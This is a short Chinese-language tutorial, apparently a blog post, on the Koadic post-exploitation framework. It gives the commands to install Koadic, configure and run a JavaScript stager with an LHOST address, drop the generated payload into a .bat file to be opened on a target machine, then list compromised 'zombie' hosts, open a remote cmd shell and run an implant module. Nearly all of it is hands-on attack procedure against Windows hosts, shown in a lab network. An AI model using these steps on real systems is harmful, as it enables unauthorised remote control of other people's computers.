项目地址：https://github.com/zerosum0x0/koadic

┌─[root@sch01ar]─[/sch01ar]└──╼ #git clone https://github.com/zerosum0x0/koadic

 下载后打开并安装所需的包

┌─[root@sch01ar]─[/sch01ar/koadic]└──╼ #pip install -r requirements.txt

 安装完成后启动程序

┌─[root@sch01ar]─[/sch01ar/koadic]└──╼ #./koadic

 

输入use和空格然后连按两下Tab键查看模块

stager开头的模块是用来反弹主机的，implant开头的模块是用来对反弹的主机进行操作

选择stager/js/disk进行测试

(koadic: sta/js/mshta)# use stager/js/disk

 

查看配置信息

(koadic: sta/js/disk)# info

 

设置lhost

(koadic: sta/js/disk)# set LHOST 192.168.220.132

 

然后run

(koadic: sta/js/disk)# run

 

然后把[>]后的东西写到一个bat文件里，放到目标主机打开

注：stager开头的模块都是一样的操作

得到目标主机的反弹

查看僵尸主机列表

(koadic: sta/js/disk)# zombies

 

注：此目标主机的ID为0

执行cmd命令，0为主机的ID

(koadic: sta/js/disk)# cmdshell 0

[koadic: ZOMBIE 0 (192.168.220.129) - cmd.exe]> whoami

 

该上implant模块了

(koadic: sta/js/disk)# use implant/fun/voice

 

这个MESSAGE随便你设置，然后run

将会在目标主机朗读MESSAGE的内容